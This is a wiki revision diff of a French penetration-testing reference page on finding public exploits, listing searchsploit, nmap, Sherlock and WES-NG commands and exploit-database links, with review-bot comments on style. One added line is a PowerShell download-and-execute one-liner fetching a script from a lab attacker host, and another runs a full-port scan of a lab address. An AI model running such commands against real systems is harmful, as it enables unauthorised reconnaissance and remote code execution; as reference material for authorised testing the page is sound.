trouver_des_exploits_publique

Differences

This page shows the differences between the selected revision and the current version of the page.


trouver_des_exploits_publique [2020/07/28 13:55]
M0N5T3R
trouver_des_exploits_publique [2023/10/01 22:32] (Current version)
M0N5T3R
Ligne 9: Ligne 9:
 **offline :** **offline :**
  
 +  * un outil comme searchsploit mais qui cherche sur exploit-db et https://github.com/nomi-sec/PoC-in-GitHub : https://github.com/usdAG/search_vulns 
   * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf   * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf
   * -> git clone https://github.com/offensive-security/exploit-database.git   * -> git clone https://github.com/offensive-security/exploit-database.git
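Review bot: the added bullet never names the tool it introduces; it opens with a description and puts the tool's own repository (https://github.com/usdAG/search_vulns) last, after the PoC-in-GitHub URL, whereas the SearchSploit item below it starts with the tool name. Start the line with `search_vulns` and its URL, then say what it searches (exploit-db and PoC-in-GitHub).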
Ligne 19: Ligne 20:
   * -> searchsploit -x 7618[.c] #Open vi to inspect the exploit   * -> searchsploit -x 7618[.c] #Open vi to inspect the exploit
   * -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result   * -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result
 +  * -> searchsploit openssh 3 --color| grep -i 'openssh 3.' #This example filter the result 
 +  * -> nmap --min-rate 200 -p- 10.10.10.93 -oX resultat.xml
 +  * -> searchsploit -x --nmap resultat.xml
 +
 +
  
   * MSF-Search   * MSF-Search
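Review bot: in the added `grep -i 'openssh 3.'` line the dot is an unescaped regex metacharacter, so the filter also keeps results where any other character follows the 3 (a two-digit major version, for example); use `grep -iF 'openssh 3.'` or escape it as `3\.`. The added `searchsploit -x --nmap resultat.xml` combines `-x`, which the context line above documents with an exploit ID (`-x 7618[.c]`), with `--nmap`; the form documented just above is `searchsploit --nmap file.xml`, so either drop `-x` or explain what the combination is meant to do. The scan target 10.10.10.93 is specific to one lab and reads better as a placeholder such as `<target>`.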
Ligne 29: Ligne 35:
   * Nmap vuln   * Nmap vuln
   * -> nmap -Pn -n -sV -oN vulnnmapoutput.txt --script vuln 127.0.0.1   * -> nmap -Pn -n -sV -oN vulnnmapoutput.txt --script vuln 127.0.0.1
 +
 +  * Sherlock , PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
 +  * -> https://github.com/rasta-mouse/Sherlock
 +  * -> powershell "IEX(New-Object Net.Webclient).downloadString('http://10.10.14.13:3001/Sherlock.ps1'); Find-AllVulns"
 +  * ->  attend quelque minutes
  
  
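Review bot: the added PowerShell line hard-codes a lab-specific address (http://10.10.14.13:3001) and has the host fetch Sherlock.ps1 over plain HTTP and run it with no integrity check, so whatever that address serves is what gets executed. Replace the address with a placeholder such as `<your-host>:<port>` and state that the served file should be the copy from the repository linked on the line above, reviewed before use. The last added bullet, `attend quelque minutes`, is in French with a typo while the Sherlock description is in English; "wait a few minutes" (or "attendre quelques minutes") would be consistent.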
Ligne 41: Ligne 52:
  
   * Windows Exploit Suggester - Next Generation (WES-NG)   * Windows Exploit Suggester - Next Generation (WES-NG)
-  * -> git clone https://github.com/bitsadmin/wesng+  * -> git clone https://github.com/bitsadmin/wesng.git
   * -> python wes.py --update   * -> python wes.py --update
   * -> python wes.py sysinfoTarget.txt    * -> python wes.py sysinfoTarget.txt 
Ligne 48: Ligne 59:
   * -> wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash   * -> wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash
   * Only show vulnerabilities of a certain impact   * Only show vulnerabilities of a certain impact
-  * -> wes.py systeminfo.txt - -impact "Remote Code Execution"+  * -> wes.py systeminfo.txt - -impact "Remote Code Execution" 
   * -> wes.py systeminfo.txt -i "Remote Code Execution"   * -> wes.py systeminfo.txt -i "Remote Code Execution"
 +  * -> wes.py systeminfo.txt -i "Elevation of Privilege"
   * Only show vulnerabilities of a certain severity   * Only show vulnerabilities of a certain severity
-  * -> wes.py systeminfo.txt --severity critical+  * -> wes.py systeminfo.txt --severity critical important
   * -> wes.py systeminfo.txt -s critical   * -> wes.py systeminfo.txt -s critical
  
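Review bot: the changed impact line still reads `- -impact` with a space between the two dashes, which is not the `--impact` option; the edit only added a trailing space. Write `wes.py systeminfo.txt --impact "Remote Code Execution"` so it matches the `-i` short form on the next line. In the severity pair, the long form now passes `critical important` while the short form `-s critical` below it was left unchanged; update both or say that they are two different examples.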
Ligne 65: Ligne 77:
 **online :** **online :**
  
 +  * https://cn-sec.com/?s=CVE
 +  * https://snyk.io/vuln
   * http://www.securityfocus.com/   * http://www.securityfocus.com/
   * https://www.cvedetails.com/   * https://www.cvedetails.com/
Ligne 96: Ligne 110:
   * http://routerpwn.com/   * http://routerpwn.com/
   * https://www.rapid7.com/db/   * https://www.rapid7.com/db/
-  * http://0day.today/+  * http://0day.today/ **non recommandé** [[https://forum.zenk-security.com/showthread.php?tid=2590|thread sur le forum]]
   * https://cve.mitre.org/cve/   * https://cve.mitre.org/cve/
   * http://www.exploitalert.com   * http://www.exploitalert.com
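Review bot: the `**non recommandé**` label added to the 0day.today entry gives no reason on the page, so the reader has to follow the forum thread to learn why. Add a few words after the label summarising the reason and keep the thread link as the reference.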
Ligne 119: Ligne 133:
   * https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available.   * https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available.
   * https://cveapi.com/ cveapi - free API for CVE data.   * https://cveapi.com/ cveapi - free API for CVE data.
- 
- 
   * http://securityvulns.com/   * http://securityvulns.com/
- 
   * http://insecure.org/sploits_all.html   * http://insecure.org/sploits_all.html
- 
- 
   * http://zerodayinitiative.com/advisories/published/   * http://zerodayinitiative.com/advisories/published/
- 
   * http://nmrc.org/pub/index.html   * http://nmrc.org/pub/index.html
 +  * http://oval.mitre.org
  
-  * http://oval.mitre.org 
  
 +**Finding more information regarding the exploit **
 +  * http://www.cvedetails.com
 +  * http://packetstormsecurity.org/files/cve/[CVE]
 +  * http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
 +  * http://www.vulnview.com/cve-details.php?cvename=[CVE]
  
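Review bot: the new "Finding more information regarding the exploit" list adds http://www.cvedetails.com, which the online list above already carries as https://www.cvedetails.com/, and all four added links use http. Drop the duplicate or point to the existing entry, and use https where the site supports it. The `[CVE]` token in the three URL templates is never explained; say once that it stands for the CVE identifier being looked up. The heading also has a stray space before the closing `**`.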
trouver_des_exploits_publique.1595937334.txt.gz · Last modified: 2020/07/28 13:55 by M0N5T3R